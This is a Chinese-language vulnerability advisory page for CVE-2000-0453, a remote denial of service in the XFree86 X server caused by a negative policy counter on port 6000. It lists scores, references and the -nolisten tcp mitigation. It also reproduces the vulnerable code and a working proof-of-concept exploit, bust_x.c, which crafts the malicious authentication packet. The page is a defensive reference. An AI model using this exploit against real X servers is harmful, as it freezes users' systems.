CVE-2000-0453
CVSS5.0
发布时间 :2000-05-18 00:00:00
修订时间 :2008-09-10 15:04:42
NMCOE    

[原文]XFree86 3.3.x and 4.0 allows a user to cause a denial of service via a negative counter value in a malformed TCP packet that is sent to port 6000.


[CNNVD]XFree86 Xserver拒绝服务漏洞(CNNVD-200005-074)

        XFree86 3.3.x 版本和4.0版本存在漏洞。远程攻击者借助发送到端口6000的畸形IP包中负的计数器值导致拒绝服务漏洞。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:xfree86_project:x11r6:4.0
cpe:/a:xfree86_project:x11r6:3.3.5
cpe:/a:xfree86_project:x11r6:3.3.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0453
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0453
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-074
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1235
(UNKNOWN)  BID  1235
http://archives.neohapsis.com/archives/bugtraq/2000-05/0223.html
(UNKNOWN)  BUGTRAQ  20000518 Nasty XFree Xserver DoS
ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2000-012.0.txt
(UNKNOWN)  CALDERA  CSSA-2000-012.0

- 漏洞信息

XFree86 Xserver拒绝服务漏洞
中危 边界条件错误
2000-05-18 00:00:00 2005-05-02 00:00:00
远程  
        XFree86 3.3.x 版本和4.0版本存在漏洞。远程攻击者借助发送到端口6000的畸形IP包中负的计数器值导致拒绝服务漏洞。

- 公告与补丁

        Solution submitted by Fred Silva :
        Run the X server with the option "-nolisten tcp" set. This option causes the X server to not listen connections from any client. To use this option, simply add it to serverargs variable in the /usr/X11/bin/startx script.
        FreeBSD has released fixes for this vulnerability.
        XFree86 X11R6 3.3.6
        

- 漏洞信息 (19950)

XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver Denial of Service Vulnerability (EDBID:19950)
linux dos
2000-05-18 Verified
0 Chris Evans
N/A [点击下载]
source: http://www.securityfocus.com/bid/1235/info

A denial of service exists in XFree86 3.3.5, 3.3.6 and 4.0. A remote user can send a malformed packet to the TCP listening port, 6000, which will cause the X server to be unresponsive for some period of time. During this time, the keyboard will not respond to user input, and in some cases, the mouse will also not respond. During this time period, the X server will utilize 100% of the CPU, and can only be repaired by being signaled. This vulnerability exists only in servers compiled with the XCSECURITY #define set. This can be verified by running the following:
strings /path/to/XF86_SVGA | grep "XC-QUERY-SECURITY-1"

To quote the Bugtraq post, by Chris Evans <chris@ferret.lmh.ox.ac.uk>:
"Observe xc/programs/Xserver/os/secauth.c, AuthCheckSitePolicy():

// dataP is user supplied data from the network
char *policy = *dataP;
int nPolicies;
...
// Oh dear, we can set nPolicies to -1
nPolicies = *policy++;
while (nPolicies) {
// Do some stuff in a loop
...
nPolicies--;
}

So, the counter "nPolicies", if seeded with -1, will decrement towards
about minus 2 billion, then wrap to become positive 2 billion, and head
towards its final destination of 0." 

/* bust_x.c
 * Demonstration purposes only!
 * Chris Evans <chris@scary.beasts.org>
 */
int
main(int argc, const char* argv[])
{
  char bigbuf[201];
  short s;
  char c;

  c = -120;

  memset(bigbuf, c, sizeof(bigbuf));

  /* Little endian */
  c = 'l';
  write(1, &c, 1);
  /* PAD */
  c = 0;
  write(1, &c, 1);
  /* Major */
  s = 11;
  write(1, &s, 2);
  /* Minor */
  s = 0;
  write(1, &s, 2);
  /* Auth proto len */
  s = 19;
  write(1, &s, 2);
  /* Auth string len */
  s = 200;
  write(1, &s, 2);

  /* PAD */
  s = 0;
  write(1, &s, 2);

  /* Auth name */
  write(1, "XC-QUERY-SECURITY-1", 19);

  /* byte to round to multiple of 4 */
  c = 0;
  write(1, &c, 1);

  /* Auth data */
  /* Site policy please */
  c = 2;
  write(1, &c, 1);
  /* "permit" - doesn't really matter */
  c = 0;
  write(1, &c, 1);
  /* number of policies: -1, loop you sucker:) */
  c = -1;
  write(1, &c, 1);
  /* Negative stringlen.. 201 of them just in case, chortle... */

  write(1, bigbuf, sizeof(bigbuf));
}
		

- 漏洞信息

1345
XFree86 Negative Counter Value TCP Packet DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-05-18 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站